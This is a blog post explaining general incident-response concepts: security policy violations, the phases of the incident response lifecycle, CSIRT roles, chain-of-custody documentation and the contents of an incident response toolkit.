A look into the Preparation phase of the Incident Response

Saniye Nur
8 min readSep 10


An observed occurrence within a system refers to an event, incident, or happening that is noticed, recorded, or detected within that system. It can encompass a wide range of activities, behaviors, or incidents that are observed and documented for various purposes, such as monitoring, analysis, troubleshooting, or evaluation.

In various contexts, observed occurrences can include:

  1. System Events: These are events that happen within a computer or software system, such as the execution of a program, the generation of log entries, or the occurrence of errors.
  2. Security Incidents: In cybersecurity, observed occurrences might refer to suspicious activities or breaches that are detected within a network or information system.
  3. Environmental Observations: In scientific or environmental monitoring, observed occurrences could involve tracking changes in natural systems, such as wildlife behavior, weather patterns, or environmental conditions.
  4. Business Operations: In a business context, observed occurrences could pertain to various business processes, such as sales, customer interactions, inventory changes, and more.
  5. Quality Control: In manufacturing or industrial settings, observed occurrences could be related to product defects, process deviations, or quality control checks.

The term “observed occurrence” is somewhat generic and can be used in different fields and contexts to describe something that has been witnessed, recorded, or detected within a given system or environment. The specific meaning and significance of an observed occurrence will depend on the context in which it is used and the goals or objectives of the observation.

A violation of security policies and practices refers to any action, behavior, or event that goes against established security policies, procedures, and best practices within an organization or system. Such violations can compromise the confidentiality, integrity, or availability of sensitive information, assets, or resources. Security policy violations can take various forms, including:

  1. Unauthorized Access: Gaining access to systems, networks, or data without proper authorization, such as using someone else’s login credentials or exploiting vulnerabilities to bypass security controls.
  2. Data Breaches: Unauthorized exposure, theft, or disclosure of sensitive or confidential data, such as customer information, financial records, or intellectual property.
  3. Malware Infections: Installing or executing malicious software (malware) on a system, which can include viruses, Trojans, ransomware, or spyware.
  4. Phishing Attacks: Falling victim to phishing emails or social engineering tactics that trick individuals into revealing sensitive information like passwords or financial details.
  5. Policy Violations: Actions that directly violate established security policies, such as connecting unauthorized devices to a network, sharing login
  6. Weak Passwords: Using easily guessable or weak passwords that do not meet security policy requirements, making systems vulnerable to brute-force attacks.
  7. Neglecting Updates: Failing to apply security patches and updates promptly, leaving systems vulnerable to known vulnerabilities.
  8. Improper Data Handling: Mishandling sensitive data, such as leaving documents in an unsecured location, sending confidential information over unencrypted channels, or failing to securely dispose of physical or digital records.
  9. Unauthorized Configuration Changes: Modifying system configurations or security settings without proper authorization, potentially introducing security weaknesses.
  10. Insider Threats: Actions taken by employees, contractors, or other trusted individuals with access to an organization’s systems and data that are contrary to security policies or malicious in intent.

Security policy violations are a significant concern for organizations because they can lead to security breaches, financial losses, legal consequences, and damage to an organization’s reputation. Establishing and enforcing robust security policies and practices, along with employee training and awareness programs, are essential steps in mitigating the risk of security policy violations.

Organizations typically lay down their incident response procedures during the “Preparation” phase of the incident response lifecycle. The incident response lifecycle consists of several phases, and each phase plays a crucial role in effectively responding to and managing security incidents. These phases are:

  1. Preparation: In this phase, organizations develop and document their incident response procedures, policies, and plans. They establish incident response teams, define roles and responsibilities, acquire necessary tools and resources, and conduct training and awareness programs. The goal is to be well-prepared to handle incidents when they occur.
  2. Identification: During this phase, organizations detect and identify potential security incidents. This may involve monitoring network traffic, analyzing logs, using intrusion detection systems, or receiving reports from users or automated alerting systems.
  3. Containment: Once an incident is confirmed, the containment phase aims to limit the scope and impact of the incident. Organizations take immediate actions to isolate affected systems, block malicious activity, and prevent further compromise.
  4. Eradication: In this phase, organizations work to eliminate the root cause of the incident. This may involve patching vulnerabilities, removing malware, and ensuring that the attacker no longer has access to the compromised systems.
  5. Recovery: After eradicating the incident, the recovery phase focuses on restoring affected systems and services to normal operation. Organizations ensure that data is restored, systems are tested, and operations can resume.
  6. Lessons Learned (Post-Incident Analysis): In the final phase, organizations conduct a post-incident analysis to evaluate their response to the incident. They identify weaknesses, areas for improvement, and lessons learned. This information is used to update incident response procedures and enhance security measures.

The “Preparation” phase is critical because it lays the foundation for an effective incident response program. It ensures that organizations have well-defined procedures in place, personnel are trained, and the necessary resources are available to respond promptly and effectively to security incidents when they occur. Without proper preparation, the effectiveness of the response to security incidents can be compromised.

An organization typically resumes business operations fully and updates its response capabilities during the “Recovery” phase of the incident response lifecycle. In this phase, the primary focus is on restoring normal business operations after an incident has occurred. Here’s how this phase relates to resuming business operations and updating response capabilities:

  1. Resuming Business Operations: During the “Recovery” phase, the organization works on restoring affected systems, services, and processes to their pre-incident state or an acceptable operational level. This includes verifying that critical systems are functioning properly, data is restored, and any temporary workarounds are removed. The goal is to minimize downtime and resume normal business operations as swiftly as possible.
  2. Updating Response Capabilities: As part of the lessons learned from the incident, organizations often identify areas for improvement in their incident response capabilities. These may include revising incident response plans, enhancing security controls, providing additional training for incident responders, and procuring or upgrading tools and resources. The “Recovery” phase is a suitable time to implement these improvements to better prepare for future incidents.

A group that handles events involving cybersecurity breaches, comprising individuals with different skills and expertise, is typically known as a “Computer Security Incident Response Team” or “CSIRT.” CSIRTs play a crucial role in an organization’s cybersecurity posture by responding to and managing security incidents, including cyberattacks, breaches, and vulnerabilities.

A CSIRT is a dedicated team that may consist of security analysts, incident responders, forensic experts, network administrators, legal advisors, and other professionals with diverse skills and knowledge related to cybersecurity. The team’s responsibilities often include:

  1. Incident Detection: Monitoring networks and systems for signs of security incidents.
  2. Incident Analysis: Investigating and analyzing security events to determine the scope, impact, and root cause of incidents.
  3. Incident Containment: Taking immediate actions to limit the spread of the incident and prevent further damage.
  4. Incident Eradication: Identifying and eliminating the source of the incident, such as malware or vulnerabilities.
  5. Recovery: Restoring affected systems and services to normal operation.
  6. Communication: Providing timely and accurate communication to stakeholders, including management, employees, customers, and law enforcement if necessary.
  7. Forensics: Collecting and preserving digital evidence for legal and investigative purposes.
  8. Post-Incident Analysis: Conducting lessons learned and post-incident reviews to improve incident response procedures and security measures.

CSIRTs can vary in size and structure, depending on the organization’s size and security needs. They are an essential component of an organization’s cybersecurity strategy and help ensure a coordinated and effective response to security incidents.

The documents used to accompany evidence collected and keep track of who handles the investigation procedures typically include:

  1. Chain of Custody Form or Log: This document records the chronological history of the physical or digital evidence, including who collected it, when, and from where. It also documents who had custody of the evidence at each stage of the investigation.
  2. Evidence Labels or Tags: Physical evidence may be labeled or tagged with unique identifiers that correspond to entries in the chain of custody log. These labels help ensure that evidence is properly tracked and identified.
  3. Evidence Handling Procedures: These are written guidelines or standard operating procedures (SOPs) that detail how evidence should be collected, preserved, stored, and transported. They may also specify who is responsible for each step of the process.
  4. Incident Report or Case File: This document provides an overview of the incident, including details such as date, time, location, parties involved, and a description of the evidence collected. It may also include initial findings or observations.
  5. Forensic Examination Reports: For digital evidence, detailed reports of the forensic examination should be generated. These reports document the methods used, the findings, and any conclusions drawn from the analysis.
  6. Photographs or Video Recordings: Visual documentation of the evidence can provide important context and help establish its integrity. This is particularly important for physical evidence.
  7. Witness Statements: Statements from individuals who were present or involved in the incident may be collected to provide additional context or corroborate evidence.
  8. Legal Documentation: Depending on the nature of the investigation, legal documents such as search warrants, subpoenas, or court orders may be part of the accompanying documentation.
  9. Evidence Packaging: The packaging used to store and transport physical evidence should be labeled and sealed to prevent tampering.
  10. Access Logs or Records: Digital evidence may be accompanied by access logs or records indicating who accessed the evidence, when, and for what purpose.

Maintaining accurate and well-documented records is crucial for preserving the integrity of evidence and ensuring that the investigation procedures adhere to legal and procedural standards. It also helps establish the credibility and reliability of the investigation process

A kit containing the necessary incident-handling tools and resources is often referred to as an “Incident Response Toolkit” or “Incident Handling Kit.” This kit typically includes various tools, software, documentation, and resources that an incident response team or cybersecurity professionals might need to effectively respond to and manage security incidents.

The contents of an incident response toolkit can vary depending on the organization’s needs and the types of incidents it may encounter. Common items found in such a toolkit may include:

  1. Forensic Tools: Software and hardware tools for collecting, analyzing, and preserving digital evidence, such as disk imaging software, memory analysis tools, and write-blockers.
  2. Network Monitoring and Analysis Tools: Tools for monitoring network traffic, analyzing logs, and identifying suspicious or malicious activity.
  3. Malware Analysis Tools: Software and sandboxes for examining and analyzing malicious software (malware) samples.
  4. Security Information and Event Management (SIEM) Systems: SIEM platforms that help collect, correlate, and analyze security event data from various sources.
  5. Documentation Templates: Incident response plans, checklists, and templates for documenting incident details, actions taken, and lessons learned.
  6. Communication Tools: Secure communication tools and templates for notifying stakeholders, including management, law enforcement, and affected parties.
  7. Digital Forensic Resources: Reference materials, guides, and documentation on digital forensics and incident response best practices.
  8. Legal and Compliance Resources: Legal and compliance documentation, including contact information for legal counsel and regulatory authorities.
  9. Backup and Recovery Tools: Tools and procedures for data backup and recovery in case of data loss during an incident.
  10. Hardware and Accessories: Hardware components such as external hard drives, write-once media, and evidence bags for physical evidence handling.
  11. Training Materials: Educational materials and training resources for incident response team members.

The Incident Response Toolkit is a critical resource for organizations to ensure they are well-prepared to handle security incidents promptly and effectively. It helps streamline the incident response process and ensures that the necessary tools and documentation are readily available when needed.